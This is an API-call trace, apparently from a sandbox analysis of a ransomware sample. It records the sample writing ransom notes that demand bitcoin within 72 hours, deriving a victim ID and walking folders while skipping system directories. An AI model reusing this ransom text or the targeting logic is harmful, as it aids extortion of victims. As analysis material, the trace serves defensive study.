	[0168.469] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0168.472] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0168.472] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0168.476] CloseHandle (hObject=0x388) returned 1
	[0168.476] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0168.477] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.477] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0168.482] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0168.482] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0168.482] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0168.482] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0168.482] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0168.483] CloseHandle (hObject=0x388) returned 1
	[0168.483] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0168.483] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0168.484] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0168.484] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\HELP_DECRYPT_YOUR_FILES.HTML") returned 87
	[0168.484] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0168.484] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0168.484] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0168.487] CloseHandle (hObject=0x388) returned 1
	[0168.488] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.488] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0168.489] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.489] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0168.496] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0168.496] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0168.496] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0168.496] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0168.496] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0168.497] CloseHandle (hObject=0x388) returned 1
	[0168.497] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\*.*" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe080ca95, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x7df488aa, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0168.497] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\*.*") returned 62
	[0168.497] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.498] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\*.*", cchLength=0x3e | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*") returned 0x3e
	[0168.498] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.498] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="windows") returned 0x0
	[0168.498] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.498] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="boot") returned 0x0
	[0168.498] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.499] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="system volume information") returned 0x0
	[0168.499] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.499] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0168.499] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.499] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="temp") returned 0x0
	[0168.499] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.499] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="program files") returned 0x0
	[0168.499] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.500] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="program files (x86)") returned 0x0
	[0168.500] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.500] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="appdata") returned 0x0
	[0168.500] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.500] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="application data") returned 0x0
	[0168.500] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.500] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="winnt") returned 0x0
	[0168.500] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.501] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="tmp") returned 0x0
	[0168.501] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.501] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="cache") returned 0x0
	[0168.501] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.501] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="temporary internet files") returned 0x0
	[0168.501] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.502] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="webcache") returned 0x0
	[0168.502] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.502] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="inetcache") returned 0x0
	[0168.502] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.502] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="nvidia") returned 0x0
	[0168.502] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.502] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="packages") returned 0x0
	[0168.502] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.503] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="cookies") returned 0x0
	[0168.503] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.503] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="programdata") returned 0x0
	[0168.503] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0168.503] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0168.503] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe080ca95, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x7df488aa, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0168.503] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0168.503] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7df488aa, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7df488aa, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7df6ea0d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0168.504] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7df2259f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7df2259f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7df488aa, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0168.504] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xe010bd8d, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe010bd8d, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe010bd8d, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x0, dwReserved1=0x0, cFileName="WINDOWS.DIAGNOSTICS.xml", cAlternateFileName="WINDOW~1.XML")) returned 1
	[0168.504] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xe042cf6a, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe042cf6a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe042cf6a, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x0, dwReserved1=0x0, cFileName="WINDOWS.PERFTRACKESCALATIONS.xml", cAlternateFileName="WINDOW~3.XML")) returned 1
	[0168.504] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xe05d08a5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe05d08a5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe05d08a5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x0, dwReserved1=0x0, cFileName="WINDOWS.PERFTRACKPOINTDATA.xml", cAlternateFileName="WINDOW~4.XML")) returned 1
	[0168.504] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xe0263207, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe0263207, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe0263207, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x0, dwReserved1=0x0, cFileName="WINDOWS.SIUF.xml", cAlternateFileName="WINDOW~2.XML")) returned 1
	[0168.504] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35b42b5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972ca54f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows.Uif.static", cAlternateFileName="WINDOW~1.STA")) returned 1
	[0168.504] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xe080ca95, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe080ca95, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe080ca95, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x0, dwReserved1=0x0, cFileName="WINDOWS.UIF.xml", cAlternateFileName="WICECA~1.XML")) returned 1
	[0168.504] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xe080ca95, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe080ca95, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe080ca95, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x0, dwReserved1=0x0, cFileName="WINDOWS.UIF.xml", cAlternateFileName="WICECA~1.XML")) returned 0
	[0168.504] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0168.504] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0168.505] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe1f25738, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe1f25738, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DownloadedSettings", cAlternateFileName="DOWNLO~2")) returned 1
	[0168.505] lstrcmpW (lpString1="DownloadedSettings", lpString2="..") returned 1
	[0168.505] lstrcmpW (lpString1="DownloadedSettings", lpString2=".") returned 1
	[0168.505] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis"
	[0168.505] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\"
	[0168.505] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\", lpString2="DownloadedSettings" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings"
	[0168.506] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings"
	[0168.506] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\"
	[0168.506] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\"
	[0168.506] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\*.*"
	[0168.506] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\*.*" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe1f25738, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe1f25738, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0168.519] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\*.*") returned 61
	[0168.519] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.519] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\*.*", cchLength=0x3d | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*") returned 0x3d
	[0168.519] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.519] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="windows") returned 0x0
	[0168.520] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.520] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="boot") returned 0x0
	[0168.520] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.520] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="system volume information") returned 0x0
	[0168.520] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.520] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0168.520] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.521] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="temp") returned 0x0
	[0168.521] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.521] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="program files") returned 0x0
	[0168.521] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.521] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="program files (x86)") returned 0x0
	[0168.521] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.521] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="appdata") returned 0x0
	[0168.521] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.522] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="application data") returned 0x0
	[0168.522] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.522] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="winnt") returned 0x0
	[0168.522] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.522] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="tmp") returned 0x0
	[0168.522] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.522] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="cache") returned 0x0
	[0168.523] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.523] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="temporary internet files") returned 0x0
	[0168.523] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.523] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="webcache") returned 0x0
	[0168.523] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.523] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="inetcache") returned 0x0
	[0168.523] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.523] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="nvidia") returned 0x0
